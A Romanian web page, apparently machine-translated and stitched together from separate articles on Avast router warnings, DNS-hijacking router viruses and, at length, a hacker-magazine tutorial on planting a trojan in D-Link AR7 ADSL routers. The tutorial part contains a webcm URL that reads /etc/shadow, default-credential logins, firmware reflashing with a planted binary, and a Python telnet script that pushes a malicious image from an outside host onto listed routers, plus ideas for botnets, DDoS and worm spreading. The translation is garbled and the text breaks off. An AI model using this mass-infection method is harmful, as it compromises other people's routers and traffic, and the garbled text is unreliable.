Avast scrie că routerul este vulnerabil, infectat și configurat incorect. Virus în router - DNS rău intenționat
Acest lucru vă poate părea ciudat, dar există viruși care infectează nu computerele, laptopurile sau dispozitivele mobile, ci routerele.
De ce să faci asta? Apoi, deși routerul dvs. nu stochează nicio informație valoroasă, accesul la acest dispozitiv vă va permite să modificați setările serverului DNS. Acest lucru, la rândul său, va permite escrocilor să trimită unele dintre solicitările dvs. către site-uri false, unde veți introduce informații sensibile utile escrocilor. Multe modele de router sunt susceptibile la infecție, nu are sens să oferi o listă, deoarece poate fi actualizată în mod constant. Pentru siguranța dumneavoastră, vă recomand cu recomandări care vă vor permite să evitați infectarea.
Cum funcționează virusul?
Computerul dvs. este infectat cu un virus numit Win32.Sector. Acesta, la rândul său, descarcă Trojan.Rbrute de pe un server special, care caută în rețea routere și încearcă să obțină acces la configurație. După obținerea accesului, el schimbă adresele DNS curente înregistrate în router cu ale sale. Apoi, toate dispozitivele conectate la router ajung pe pagina de pe care este descărcat Win32.Sector.
- Pictograma „Internet” este aprinsă, dar nu puteți accesa majoritatea site-urilor sau sunt încărcate site-urile greșite pe care doriți să le deschideți
- Site-urile web ciudate se deschid spontan
- Computerul nu poate obține o adresă IP de la rețeaua dvs. (i se atribuie o adresă precum 169.254.xxx.xxx a subrețelei Microsoft)
Cum se elimină virusul Trojan.Rbrute de pe un router?
- În primul rând, trebuie să resetați routerul la setările din fabrică. Pentru a face acest lucru, apăsați butonul „Reset” de pe panoul din spate al routerului și așteptați 10 secunde până când routerul clipește toți indicatorii și repornește.
2. Accesați panoul de administrare al routerului și schimbați parola standard de acces la panoul de administrare cu propria dvs., de preferință una mai complexă.
3. Configuram din nou routerul, verificam daca Internetul functioneaza corect.
4. De pe site-ul oficial al producătorului de router, descărcați cel mai recent firmware pentru modelul dvs. și flash-l. Cel mai probabil, în cea mai recentă versiune de firmware, găurile prin care atacatorii au obținut acces la setările routerului sunt închise.
5. După aceasta, verificăm computerul pentru malware pentru a exclude posibilitatea ca WinSector sau Trojan.Rbrute să rămână pe hard diskul computerului. Puteți face acest lucru folosind instrumente gratuite din articol.
Sper că articolul meu te-a ajutat =)
Până de curând, nici măcar nu știam că routerul Avast își sperie utilizatorii cu avertismente „înfricoșătoare” referitoare la routerele lor. După cum se dovedește, antivirusul Avast scanează routerele Wi-Fi. Dă rezultate că routerul nu este configurat corect, dispozitivul este vulnerabil la atacuri sau, în general, că routerul este infectat și infectat, iar atacatorii au interceptat deja adrese DNS și vă redirecționează cu succes către site-uri rău intenționate, furând informații despre carduri de credit și totul este foarte rău în general. Toate aceste avertismente, desigur, sunt asezonate cu o culoare roșie periculoasă și instrucțiuni confuze pe care nici un bun specialist fără bere nu le va înțelege. Nici măcar nu vorbesc de utilizatori obișnuiți. Așa arată problemele găsite pe routerul D-Link DIR-615:
Dispozitivul este vulnerabil la atacuri:
Soluția este, desigur, actualizarea firmware-ului routerului. Pentru că ce altceva 🙂 Avast poate afișa și un mesaj că routerul tău este protejat de o parolă slabă sau ruterul nu este protejat de hacking.
În unele cazuri, este posibil să vedeți un mesaj care routerul dvs. este infectat, iar conexiunile sunt redirecționate către serverul rău intenționat. Antivirusul Avast explică acest lucru spunând că routerul dvs. a fost piratat și că adresele sale DNS au fost schimbate cu cele rău intenționate. Și există instrucțiuni pentru rezolvarea acestei probleme pentru diferite routere: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys/Cisco, NETGEAR, Sagem/Sagemco.
Pe scurt, toate aceste recomandări au ca scop verificarea adreselor DNS și a serviciilor legate de DNS. Prin intermediul căruia atacatorii pot schimba DNS-ul de pe router și vă pot redirecționa către site-urile lor rău intenționate. Există instrucțiuni detaliate despre cum să verificați totul pe routere de la diferiți producători.
Cum să răspundeți la avertismentele de la Avast despre o vulnerabilitate a routerului?
Cred că această întrebare îi interesează pe toată lumea. Mai ales dacă ai ajuns pe această pagină. Dacă vă întrebați cum aș reacționa la astfel de avertismente de la antivirus, atunci răspunsul este simplu - deloc. Sunt sigur că Avast ar fi găsit găuri în routerul meu prin care să fiu piratat. Am doar Dr.Web. El nu face astfel de verificări.
Poate mă înșel, dar niciun antivirus, altul decât Avast, verifică ruterele Wi-Fi la care ești conectat pentru diverse tipuri de vulnerabilități. Și această caracteristică, numită Home Network Security, a apărut în 2015. În versiunea Avast 2015.
Avast vă scanează routerul pentru probleme de securitate a dispozitivului. Deși, nu înțeleg pe deplin cum o face. De exemplu, cum verifică aceeași parolă pentru introducerea setărilor routerului. Urmează utilizatorul sau este o metodă de selecție? Dacă ghiciți, parola este proastă 🙂 Bine, nu sunt programator.
Personal, cred că toate aceste avertismente nu sunt altceva decât simple recomandări pentru a consolida securitatea routerului tău. Acest lucru nu înseamnă că cineva v-a spart deja și vă fură datele. Ce oferă Avast:
- Setați o parolă bună și actualizați firmware-ul routerului. Se spune că altfel s-ar putea să fii piratat. Ok, acest lucru este deja clar. Acest lucru nu trebuie să fie semnalat ca un fel de vulnerabilitate teribilă. Deși, din nou, nu înțeleg cum determină antivirusul că versiunea software-ului routerului este învechită. Mi se pare că acest lucru este imposibil.
- Routerul nu este protejat de conexiunile de la Internet. Cel mai probabil, acest avertisment apare după verificarea porturilor deschise. Dar în mod implicit, funcția „Acces de la WAN” este dezactivată pe toate routerele. Mă îndoiesc foarte mult că cineva îți va pirata routerul pe Internet.
- Ei bine, cel mai rău lucru este înlocuirea adreselor DNS. Dacă sunt detectate probleme cu DNS, Avast scrie direct că „Routerul tău este infectat!” Dar în 99% din cazuri nu este cazul. Din nou, aproape întotdeauna routerul primește automat DNS de la furnizor. Și toate funcțiile și serviciile prin care atacatorii pot falsifica cumva DNS-ul sunt dezactivate implicit. Mi se pare că de foarte multe ori antivirusul înțelege greșit unele setări ale utilizatorului.
Ceva de genul. Desigur, s-ar putea să nu fiți de acord cu mine. Mi se pare că este mult mai ușor să accesezi computerul direct și să-l infectezi decât să o faci cu routerul. Dacă vorbim de un atac prin internet. Voi fi bucuros să văd părerea dumneavoastră despre această problemă în comentarii.
Cum să vă protejați routerul și să eliminați avertismentul de la Avast?
Să încercăm să descoperim fiecare articol pe care Avast îl verifică cel mai probabil și emite avertismente.
- Routerul este protejat cu o parolă slabă. Fără criptare.În primul caz, antivirusul are o parolă pe care trebuie să o introduceți când intrați în setările routerului. De obicei, parola implicită este admin. Sau nu este instalat deloc. Și se pare că toți cei care sunt conectați la rețeaua dvs. pot intra în setările routerului. Prin urmare, această parolă trebuie schimbată. Am scris cum să fac asta în articol: . În ceea ce privește parola rețelei Wi-Fi, aceasta trebuie să fie și puternică, iar tipul de criptare WPA2 trebuie utilizat. Despre asta scriu întotdeauna în instrucțiunile de configurare a routerelor.
- Routerul este vulnerabil din cauza software-ului vechi. Acest lucru nu este în întregime adevărat. Dar, dacă există un firmware nou pentru modelul de router, atunci este recomandabil să îl actualizați. Nu numai pentru a îmbunătăți securitatea, ci și pentru o funcționare mai stabilă a dispozitivului și noi funcții. Avem instrucțiuni pe site-ul nostru pentru actualizarea software-ului pentru routere de la diferiți producători. Îl puteți găsi prin căutare sau întrebați în comentarii. Aici este pentru.
- Setările DNS au fost modificate. Routerul este piratat. Sincer să fiu, nu am mai văzut astfel de cazuri până acum. După cum am scris mai sus, toate serviciile prin care se poate întâmpla acest lucru sunt dezactivate implicit. Cel mai adesea, routerul primește automat DNS de la furnizor. Singurul lucru pe care îl pot sfătui este să nu introduci manual adrese DNS despre care nu ești sigur. Și dacă specificați manual adrese, este mai bine să utilizați numai DNS de la Google, care: . Acest lucru este recomandat și în recomandările Avast, care pot fi vizualizate pe site-ul oficial:. Există instrucțiuni detaliate pentru rezolvarea problemelor DNS pentru aproape toate routerele.
Asta e tot. Sper că am putut să explic măcar puțin aceste avertismente în antivirus Avast. Puneți întrebări în comentarii și nu uitați să împărtășiți informații utile despre acest subiect. Cele mai bune gânduri!
În lumina numărului tot mai mare de cazuri de înlocuire a DNS-urilor cu programe malware pe dispozitivele utilizatorilor de internet, se pune problema securității routerelor Wi-Fi. Cum să verificați un router pentru viruși? Cum să eliminați un virus de pe un router? Întrebarea este complexă și simplă în același timp. Există o soluție!
Virusul în sine nu se poate înregistra pe majoritatea routerelor moderne din cauza spațiului mic din memoria routerului în sine, dar poate zombi routerul pentru a participa la o rețea botnet. De regulă, aceasta este o rețea bot pentru a ataca diverse servere sau pentru a redirecționa și analiza fluxul de informații care vă lasă pe Internet.
Parolele și corespondența dvs. personală ar putea cădea în mâinile atacatorilor!
Acest lucru trebuie remediat cât mai repede posibil.
- Resetarea routerului
- Firmware-ul routerului
- Resetare
Resetarea routerului
Puteți reseta setările routerului apăsând butonul de resetare. De obicei, acest buton este situat pe spatele routerului, unde sunt porturile LAN. De obicei butonul este încastrat într-o gaură pentru a evita apăsarea accidentală, așa că trebuie să folosiți o scobitoare. Acest va șterge setările routerului modificate de virus și va instala setările din fabrică în locul lor. Trebuie să vă avertizez că dacă nu știți să configurați un router, atunci resetare setările sale pentru dvs nu merita!
Firmware-ul routerului
Uneori virusul „inundă” firmware modificat la router. Pentru a elimina firmware-ul virusului de pe router, puteți să flash din nou routerul.
Conectați computerul la router cu un cablu LAN. Un cablu LAN este inclus cu orice router. Sau prin Wi-Fi dacă nu este posibilă o conexiune prin cablu. Este mai bine să te conectezi cu un cablu! Conexiunea wireless este considerată instabilă și nu este potrivită pentru actualizarea firmware-ului routerului.
După ce ne-am conectat la router, deschidem browserul (Chrome, Opera, Mozilla, IE) și introducem adresa router-ului ASUS în bara de adrese, pentru Asus este 192.168.1.1, în pagina care se deschide va trebui să introduceți numele și parola pentru a intra în setările routerului. Autentificare: admin, Parola: admin. Dacă autentificarea și parola nu se potrivesc, atunci întrebați persoana care a configurat routerul pentru dvs., poate că le-a schimbat.
Descărcați firmware-ul de pe site-ul producătorului și selectați firmware-ul de pe disc folosind pagina de setări a routerului. Pentru marea majoritate a routerelor, pașii de firmware sunt aceiași.
Bună, cititorul meu! În acest articol voi vorbi despre routere ADSL grozave
– bucăți de fier care sunt indispensabile în rețelele casnice și industriale. Îți voi spune despre întrebare
exploatarea acestor glande în scopuri benefice pentru noi - cusut în brutal
Troian în interiorul routerului. Și în așa fel încât nimeni să nu observe
un administrator inteligent, nu un utilizator inteligent.
Dorințe sau cerințe de IQ
Când am scris acest articol, am presupus că citirea lui ar fi suficientă
utilizator avansat cu GNU\Linux instalat, care are și unele abilități
lucru și programare în acest sistem de operare. Cu toate acestea, se pare
este posibil să-mi repet pașii pe Windows (folosind Cygwin, de exemplu), dar
acest lucru nu va fi descris. Pentru a obține o plăcere maximă ai nevoie și de
abilități de fier de lipit (acest lucru este opțional).
Și totul a început...
Cumva m-am distras. Așadar, totul a început când același lucru a închis într-o zi
hardware sau, mai degrabă, a întrerupt în mod perfid conexiunea la Internet și nu a făcut-o
Am vrut să-l refac. În același timp, era departe, accesibilă fizic
Nu eram acolo să o văd (cu toate acestea, mințeam cumva - eram prea lene să mă ridic de pe canapea
reporniți routerul :)), interfața Web nu a răspuns, dar mi-am amintit asta
Acest lucru ar trebui să aibă telnet sau ssh. Conectați-vă în zona de administrare
nu am încercat până acum și nu am schimbat din nesăbuință parola contului meu (cum ar fi
S-a dovedit mai târziu, foarte degeaba, pentru că implicit este „admin:admin”). Deci eu
am încercat SSH și a funcționat!
$ssh [email protected]
$Parolă:
Ca un șurub din albastru! BusyBox! Nu m-am gândit niciodată la sub cui
Se pare că acest router este controlat – GNU/Linux! M-am simțit îngrozit
Mă întreb cum funcționează totul aici și, din punct de vedere mental, datorită lenei și întâmplării, eu
a intrat în cercetare.
Colectarea de informații
Deci de unde am început? Desigur, din lista de comenzi disponibile:
#busybox
...
Funcții definite în prezent:
[, frasin, busybox, pisică, chgrp, chmod, chown, cp, dată, dd, df, ecou, fals, gratuit,
grep, nume de gazdă, id, ifconfig, init, insmod, kill, ln, autentificare, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, repornire, rm, rmmod, traseu, sh, somn,
sincronizare, gudron, testare, tftp, atingere, adevărat, tty, umount, wget, whoami, da
Setul este destul de rezonabil, suficient pentru cercetarea normală și implementarea ideilor.
Apoi, s-a trezit interesul pentru versiunea de kernel:
# cat /proc/version
Linux versiunea 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc versiunea 2.95.3
20010315 (lansare/MontaVista)) #1 Thu Dec 28 05:45:00 CST 2006
Pentru referință: MontaVista este o distribuție care vizează embedded
sisteme. Marea majoritate a producătorilor de echipamente de rețea oferă
preferinta pentru acest sistem. Poate fi găsit și pe alte dispozitive, de exemplu, în
cărți electronice sau telefoane mobile.
# cat /etc/versions
CLIENT=DLinkRU
MODEL=DSL-500T
VERSIUNEA=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253
# cat /proc/cpuinfo
procesor
: 0
model CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
așteptați instrucțiuni: nu
temporizatoare de microsecunde: da
vector de întrerupere suplimentar: da
Punct de supraveghere hardware: da
Excepții VCED: nu sunt disponibile
Excepții VCEI: nu sunt disponibile
AR7 este un cip dual-core dezvoltat de Texas Instruments. El
conține un router ADSL cu drepturi depline pe un singur cip care acceptă standardele ADSL1,
ADSL2, ADSL2+. Bazat pe procesor RISC de înaltă performanță MIPS 4KEc, cu
frecvența ceasului 175 sau 233 (în funcție de tehnologia de producție: 18 microni
sau 13 µm). Cipul conține 2 interfețe UART la bord, dintre care una (UART_A)
folosit pentru a scoate informații de depanare, precum și o interfață EJTAG care servește
pentru depanare (firmware) Memorie flash. Se va discuta despre utilizarea acestor interfețe
descris mai jos.
În cele din urmă, m-am uitat la informațiile de memorie:
# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
niciunul /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0
# cat /proc/mtd
dev: size erasesize nume
mtd0: 0034f000 00010000 „mtd0”
mtd1: 00090f70 00010000 „mtd1”
mtd2: 00010000 00002000 „mtd2”
mtd3: 00010000 00010000 „mtd3”
mtd4: 003e0000 00010000 „mtd4”
Desigur, fără a uita de adresele de bloc:
# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000
Din cele de mai sus rezultă că memoria Flash (/dev/mtdblock) are 5 blocuri:
mtd0– imaginea sistemului de fișiere SquashFs. Acesta este un fișier special
un sistem care este comprimat și numai în citire. Pentru
Se folosește algoritmul de compresie gzip, dar în acest caz - LZMA (raportul de compresie
superior). Dimensiunea acestui bloc este de 4 MB.
mtd1– acest bloc conține nucleul MontaVista comprimat cu algoritmul LZMA
stare, dimensiune bloc 600 KB.
mtd2– Bootloader ADAM2, încarcă nucleul, are și el
Serviciu server FTP pentru recuperare și intermitent. Vor fi mai multe detalii despre asta
mai spus. Dimensiunea blocului este de 64 KB.
mtd3– împărțit între datele de configurare și mediu
(variabile de mediu), pe care îl puteți consulta în /proc/ticfg/env.
Datele de configurare se află în /etc/config.xml. Intermediar între dosar
sistem, blocul de configurare este închis (ca toate cm_*, control, o
ei mai târziu) programul cm_logic. Dimensiunea acestui bloc este, de asemenea, de 64 KB.
mtd4– acesta conține semnătura firmware-ului, nucleul și imaginea fișierului
sisteme. Acest bloc este utilizat la actualizarea firmware-ului prin interfața Web.
Inițial este stocat în acest bloc, apoi este verificată suma de control
și, dacă se potrivește, se înscrie pentru noul său loc.
RAM (16 MB la acest model, dar ADAM2 la acest model
vede doar 14 MB, este vindecat prin actualizare), montat în directorul /var și acesta
Îl puteți folosi cu ușurință în scopurile noastre:
# gratuit
totalul de buffer-uri partajate gratuite utilizate
Mem: 14276 10452 3824 0
Să nu uităm să parcurgem lista de procese. Dintre cele interesante care pândesc aici
demoni: thttpd - Web-server; dproxy - serverul proxy care memorează în cache cererile DNS; ddnsd
- daemon DNS; pppd... este demonul real care implementează conexiunea prin protocol
PPP, iar în parametri vedem informații despre cont. Deci, dacă routerul nu este
se preface a fi un furtun (citește – nu în modul pod), atunci poți
ușor de obținut un cont.
Programele cm_* sunt închise și codul sursă include deja
compilate (aceste programe sunt dezvoltate și de Texas Instruments, pe D-Link
Nu are rost să ne certăm pentru nerespectarea licențelor).
cm_logic– un program care controlează logica sistemului, prin intermediul acestuia
configurarea este în curs de desfășurare; sincronizează /etc/config.xml cu
partea corespunzătoare a conținutului /dev/ticfg (indicând spre mtd3).
cm_cli– interfață de linie de comandă pentru management și configurare
sisteme. De exemplu, setările de conectare se fac prin această interfață.
cm_buc– lansează și monitorizează procese, conexiuni cu reguli
(de exemplu, rulați programul ca demon; regulile includ și informații despre
porturi deschise) descrise în /etc/progdefs.xml; incarca imediat dupa
miezuri.
webcm– Interfață CGI, care nu are, de exemplu, vă permite să vă uitați la /etc/shadow,
pur și simplu accesând adresa URL.
http://192.168.1.1/../../../etc/shadow
Nu am primit nimic, thttpd nu este atât de simplu, dar dacă da:
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow
Alt lucru. Acesta poate fi folosit pentru a colecta informații dacă nu există acces la
ssh/telnet, dar există acces la interfața Web.
firmwarecfg– folosit pentru intermiterea firmware-ului prin interfața Web. La intrare
a acestui program, o imagine este transferată cu o solicitare POST din interfața Web și deja
redirecționează către memoria Flash după prima verificare a sumei de verificare a imaginii.
În acest moment, colectarea informațiilor primare este finalizată, este timpul să trecem la decisiv
actiuni.
Instalarea instrumentelor de dezvoltare și compilarea firmware-ului
Firmware pentru routerele D-Link (și toate celelalte bazate pe GNU/Linux)
distribuite sub licența GPL, le puteți obține pe site-ul oficial
server FTP. De fapt, puteți alege oricare din lista de firmware-uri propuse,
sunt aceleași (în ceea ce privește seria T). Livrarea include codul sursă al nucleului, al mediului,
instrumentele și lanțul de instrumente necesare pentru dezvoltarea/compilarea celor existente
programe. Ar trebui să fie despachetat la rădăcină și adăugat la variabila de mediu
Calea PATH către directorul bin toolchain:
$ tar xvf tools.tgz
$ export PATH=$PATH:/opt/
Acum, pentru a vă compila propriul firmware, mergeți la director
cu codurile sursă și rulați aceeași marcă.
$ cd DSL/TYLinuxV3/src && make
Vor fi puse o mulțime de întrebări despre activarea suportului pentru dispozitive (mai bine
raspunde-le pozitiv). După ce compilarea este completă, în directorul TYLinuxV3/images
Vor fi create imagini cu firmware-ul. De asemenea, puteți rula un script cu același nume ca al dvs
model din directorul /TYLinuxV3/src/scripts.
Câteva cuvinte despre transferul fișierelor între router și computer. Chiar primul
metoda pe care am folosit-o este capacitatea de a transfera fișiere prin protocolul SSH,
folosind programul scp pentru aceasta. Dar puțin mai târziu am aflat că mc (Midnight
Commander) are și capacitatea de a se conecta prin SSH (Panel -> Conexiune Shell).
Alternativ, puteți configura un server Web sau FTP la locul de muncă. Mai tarziu eu
Am preferat serverul Web, pentru că funcționează cel mai repede. L-am instalat
thttpd, mic și rapid, la fel ca pe un router. Îl lansăm acasă și îl descarcăm pe
fișierul router, după ce ați accesat directorul /var (așa cum s-a menționat
mai devreme, disponibil pentru înregistrare).
$ thttpd -g -d ~/ForRouter -u utilizator -p 8080
# cd /var
# wget http://192.168.1.2/file
Pentru a descărca un fișier de pe router, puteți, de asemenea, să ridicați serverul web:
# thttpd -g -d /var -u root -p 8080
Vă rugăm să rețineți că, dacă doriți să descărcați un fișier executabil de pe router, ar trebui
elimina drepturile de lansare. Când descărcați un număr mare de fișiere de pe router
Este mai bine să utilizați mc, nu va trebui să copiați mai întâi fișierele în /var și
eliminați drepturile și apoi ștergeți aceste fișiere pentru a elibera spațiu. În general, chestiunea
gust, alege orice opțiune care este convenabilă pentru tine.
Crearea propriului program
Să începem, desigur, cu un clasic al programării - HelloWorld. Unele speciale
nu sunt reguli. Textul programului este dureros de familiar:
#include
#include
int main(void)
{
printf("Mate.Feed.Kill.Repeat.");
întoarce 0;
}
Compilare (calea către lanțul de instrumente trebuie specificată în variabila de mediu
CALE):
$ mips_fp_le-gcc iad.c -o iad
$ mips_fp_le-strip -s iadul
# cd /var
# chmod +x iad
# ./iad
Și... nu se va întâmpla nimic, sau va apărea notificarea calea negăsită. Ce este
caz? Am vorbit deja despre cm_pc - acest program lansează altele în
conform regulilor descrise în /etc/progdefs.xml. Acum a sosit momentul
modificați și flash imaginile sistemului de fișiere.
Modificarea sistemului de fișiere
Pentru a modifica sistemul de fișiere, mai întâi trebuie
despacheta. După cum am menționat deja, sistemul de fișiere de aici este SquashFs cu patch-ul LZMA.
Pachetul de dezvoltare a firmware-ului include doar programul mksquashfs (pentru crearea
imagine), unsquashfs (pentru despachetare) lipsește. Dar nu contează, totul este disponibil
pe site-ul sistemului de fișiere, avem nevoie de prima versiune. Prin aplicarea plasturelui LZMA și
După ce s-au adunat utilitățile, le-am pus deoparte într-un loc convenabil. Mai întâi obținem imaginea
sistem de fișiere de la router:
# cat /dev/mtdblock/0 > /var/fs.img
$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs
Acum îl puteți modifica după cum doriți, iar noi îl putem trimite la FuckTheWorld
/bin și adăugați o regulă pentru a rula în /etc/progdefs.xml.
$ cp salut unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml
Și adăugăm asta (între etichete
Salvați și împachetați înapoi:
$ mksquashfs unpacked_fs my_fs.img -noappend
Vă rugăm să rețineți că imaginea sistemului de fișiere nu trebuie să depășească
dimensiuni acceptabile. Dacă simți nevoia de a încerca ceva urgent, și nu
se potrivește, eliminați orice „inutil” din imagine, cum ar fi grep, whoami sau
utilizați pachetul de fișiere executabile UPX. Acum descărcați-l pe router
imagine și treceți la secțiunea următoare.
Înregistrarea unei imagini de sistem de fișiere
Metoda de flashing a unui router este foarte simplă, implică accesarea dispozitivului
/dev/mtdblock/*. Deci, încărcați imaginea fișierului pe router în orice mod convenabil.
sistem și efectuați această acțiune simplă:
# cat my_fs.img > /dev/mtdblock/0 && reporniți
# cp my_fs.img /dev/mtdblock/0 && reporniți
După ceva timp, când procesul de înregistrare s-a încheiat, routerul se va reporni și
modificările vor intra în vigoare. Să încercăm să rulăm exemplul nostru:
# iad
Mate.Feed.Kill.Repeat.
Metode de recuperare în caz de defecțiune
Înainte de a vă intermite routerul cu „articole” mai serioase, ar trebui să aflați cum
să acţioneze în cazurile critice când routerul refuză
sarcină. Nu există situații fără speranță. Serverul FTP ADAM2 vine în ajutor. Pentru
În primul rând, ar trebui să lansați un client FTP la adresa IP ADAM2, pe care o puteți spiona
în /proc/ticfg/env (parametrul my_ipaddress).
$ftp 192.168.1.199
220 ADAM2 FTP Server gata.
530 Vă rugăm să vă autentificați cu USER și PASS.
Pentru claritate, puteți activa modul de depanare, apoi totul
informații și toate răspunsurile FTP:
Autentificare/parolă – adam2/adam2. Procesul de intermitent este foarte simplu. A începe
comutați sesiunea FTP în modul binar:
ftp> citat MEDIA FLSH
Acum trimitem, de exemplu, o imagine a sistemului de fișiere și indicăm locația
destinatii:
ftp> pune fs.img „fs.img mtd0”
Așteptăm sfârșitul înregistrării, reporniți routerul, ieșim din sesiune:
ftp> citat REBOOT
ftp> ieși
Toate! După cum poți vedea, nu este nimic complicat, acum dacă ceva nu merge bine, tu
poți oricând să remediezi situația.
Pentru ușurință în utilizare, ar trebui să dați o adresă IP normală, activați
incarcare automata (pentru a nu dansa cu resetare) si mariti putin timpul
așteptând conexiunea înainte de a încărca nucleul. Toți acești parametri sunt stocați în
variabile de mediu, există comenzi speciale FTP ADAM2: GETENV și SETENV (pentru
obținerea și respectiv setarea variabilei). În sesiunea FTP introduceți următoarele
comenzi:
ftp> SETENV autoload,1
ftp> SETENV autoload_timeout,8
ftp>SETENV adresa_miu,192.168.1.1
ftp> citat REBOOT
ftp> ieși
Routerul repornește și puteți accesa ADAM2 la 192.168.1.1:21. Dacă
va exista dorința de a reflash imaginea nucleului, iar nucleul va refuza să pornească, FTP
va începe de la sine. Înainte de a afișa intermitent imaginile modificate, asigurați-vă că
păstrați-le pe cele actuale pentru restaurare. În general, puteți modifica variabilele de mediu
și prin /proc/ticfg/env, am vrut doar să vă spun mai multe despre lucrul cu FTP.
# echo my_ipaddress 192.168.1.1 > proc/ticfg/env
Puteți verifica modificările astfel:
# cat /proc/ticfg/env | grep adresa_miu
Ce trebuie să faceți dacă doriți să încercați să reîncărcați bootloader-ul și cum
ce sa fac in caz de esec? Sau, din anumite motive, routerul nu pornește și
nu are acces la ADAM2? Există o soluție - JTAG, sau mai degrabă, acest cip conține EJTAG
(versiunea extinsa). Aceasta este o interfață pentru depanare/programare în circuit.
Pentru a ne conecta la această interfață avem nevoie de un port LPT al computerului,
conectori și 4 rezistențe. Schema este simplă.
Mă grăbesc să observ că firmware-ul prin JTAG nu este o sarcină rapidă, va dura destul de mult
mult timp. Deci ar trebui folosit doar pentru a restabili bootloader-ul,
chiar dacă nu funcționează. Pentru a comunica prin JTAG, ar trebui să utilizați un special
program, de exemplu UrJTAG. Mai jos este un exemplu despre cum funcționează această interfață.
Configurarea conexiunii:
jtag> cablu paralel 0x378 DLC5
jtag> detect
Detectare memorie flash:
jtag> detectflash 0x30000000 1
Citirea memoriei flash:
jtag> readmem 0x30000000 0x400000 fullflash.img
Scrieți în memorie (bootloader):
jtag> flashmem 0x30000000 adam2.img
De asemenea, este util să știți despre interfața UART (am promis anterior că voi vorbi despre asta). ÎN
UART_A raportează, adică înregistrează bootloader-ul (într-un stadiu incipient al pornirii de la
poți comunica cu el) și nucleul. Când scrieți nuclee modificate acest lucru
indispensabil pentru depanare. UART - Receptor/Transmițător asincron universal
(transceiver universal asincron) este aproape întotdeauna prezent
microcontrolere.
Circuitul adaptorului este foarte simplu. Bazat pe un singur cip -
Convertor de nivel TTL: MAX232 pentru COM și FT232R pentru USB. Microcircuite
Sunt destul de comune și nu vor fi probleme cu achiziția.
Circuitul este asamblat pe o placă (care poate fi plasată cu ușurință într-o carcasă
conector port COM) în 20 de minute și aduce o mulțime de beneficii. De exemplu, la depanare
nucleele sunt o soluție absolut de neînlocuit. Ce se întâmplă dacă electronica este o problemă? Ieșire
sunt cabluri USB pentru telefoane vechi, au doar un convertor
UART - USB.
Câteva idei de distribuție
Este grozav să ai propriul tău proxy/sox pe routerul altcuiva. La fel ca spam-ul
router pentru toate protocoalele. Acesta nu este un computer Windows, care
reamenajat lunar :). Routerele nu sunt adesea schimbate sau reflashate. da si
Cine altcineva în afară de noi s-ar gândi la ideea de a infecta un router?
Nu uitați, avem controlul asupra întregului trafic de la utilizator/rețea. Pentru mai mult
În routerele puternice este deja posibil să agățați un bot DDOS. Ascunde fișierul/ascunde procesul,
interceptați scrierea în blocurile mtd fără a suprascrie programul nostru - toate acestea
tot ceea ce!
Să presupunem că sunteți pe cale să începeți să scrieți un program serios pentru un router.
Depanarea foarte bună este importantă, probabil va trebui să o faceți de câteva ori
rescrie/restaurează imagini... Aceasta este o perspectivă foarte tristă. Chiar și mâinile
scăpați puțin, dacă luați în considerare și că resursa de rescriere a memoriei Flash
este mic (mai multe detalii în documentația pentru cipul de memorie) și există o perspectivă
distruge-o. Dar există o cale de ieșire! Qemu poate emula AR7! Vă puteți imagina ce
oferă oportunități și confort nelimitat? Acum nimic nu ne oprește
scrie ceva incredibil de tare!
Asa de. Ai scris un program, l-ai testat pe cont propriu sau pe routerele altor 1-2 persoane, dar
toată rețeaua este încă înainte, infectarea manuală este o corvoadă, pe al 10-lea router pornești deja
blestemă lumea întreagă și șirurile „cat” și „mtd” plutesc în ochii tăi. Hai să scriem
un program pentru automatizarea acestor acțiuni de rutină. Am ales limbajul python.
Planul de lucru este următorul:
- compilați o listă de routere, de exemplu, folosind nmap;
- scriptul ar trebui să ia adrese IP din listă în ordine, introduceți prin
telnet cu autentificare/parolă standard; - apoi aceiași pași: încărcați imaginea modificată,
rescrie, repornește.
#!/usr/bin/env python
#Encode=UTF-8
import telnetlib,time
SERVER="http://anyhost.com/fs.image"
pentru addr in open ("iplist.txt"):
telnet = telnetlib.Telnet(adresa)
telnet.set_debuglevel(1)
telnet.read_until("login:")
timp.somn(5)
telnet.write(„admin\n”)
telnet.read_until("Parola:")
telnet.write(„admin\n”)
telnet.read_until("#")
telnet.write("cd /var && wget " + SERVER)
telnet.read_until("#")
telnet.write("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write(„repornire”)
telnet.close()
Logica scenariului este foarte departe de a fi ideală, acum voi explica de ce. Pentru
În primul rând, ar trebui să verificați versiunea de firmware/kernel și modelul de router, deoarece ar putea exista
diferențe serioase în muncă. Apoi, în loc de spații de firmware, ar trebui să descărcați
imaginea sistemului de fișiere de pe router, despachetați, modificați și trimiteți
înapoi. Acest lucru va elimina problemele care apar cu compatibilitatea în diferite
modele/versiuni de firmware, deoarece stabilitatea funcționării este cel mai important lucru pentru dumneavoastră.
De asemenea, un virus poate avea funcțiile unui vierme, iar dacă doriți, puteți oricând
atașați un scanner de rețea, forță brută pentru RDP și caracteristici similare acestuia.
Există o altă modalitate grozavă de a o răspândi. Nimic nu te împiedică să scrii
program pentru Windows, pe care îl veți avea cu dvs. (sau descărcați de pe dvs
server) imaginea sistemului de fișiere și infectați routerul cu aceasta, dacă este prezent.
Distribuiți acest program în toate modurile „standard”: unități amovibile,
exploit-uri pentru programe, infectarea altor programe... Prin combinarea acestor metode,
Puteți crea o pandemie gravă. Imaginează-ți imaginea asta - până la urmă
Astfel de dispozitive sunt omniprezente.
Protecție router
După ce am săpat toate acestea, m-am gândit: cum pot proteja routerul? Și apoi, vezi, și
O să ajung și eu acolo. Primul pas este schimbarea parolei utilizatorului într-o parolă mai complexă și
